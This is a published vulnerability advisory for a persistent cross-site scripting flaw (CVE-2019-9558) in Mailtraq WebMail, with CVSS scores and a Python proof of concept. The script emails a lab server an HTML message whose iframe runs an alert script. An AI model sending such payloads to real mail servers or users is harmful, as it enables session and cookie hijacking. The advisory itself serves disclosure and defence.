Mailtraq WebMail 2.17.7.3550 Cross Site Scripting

2019.03.05
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Persistent Cross Site Scripting (XSS) - Mailtraq WebMail version 2.17.7.3550 # CVE: CVE-2019-9558 # Exploit Author: Aloyce J. Makalanga # Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr> # Vendor Homepage: http://www.mailtraq.com/mail-server-software # Category: webapps # Attack Type: Remote # Impact: Data/Cookie hijacking 1. Description Mailtraq WebMail version 2.17.7.3550 has Persistent Cross Site > Scripting (XSS) via the body of an e-mail message. To exploit the > vulnerability, the victim must open an email with malicious Javascript > inserted into the body of the email as an iframe. 2. Proof of Concept #!/usr/bin/env python -tt # -*- coding: utf-8 -*- # Import modules import smtplib def trigger_persistence_xss(): email_addr = 'attacker@aloyce.local' email = 'From: %s\n' % email_addr email += 'To: %s\n' % email_addr email += 'Subject: Your PayCheck\n' email += 'Content-type: text/html\n\n' email += "<IFRAME SRC='javascript:alert('XSS');'></IFRAME>" s = smtplib.SMTP('192.168.1.172', 25) s.sendmail(email_addr, email_addr, email) s.quit() def main(): pass if __name__ == '__main__': trigger_persistence_xss() main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top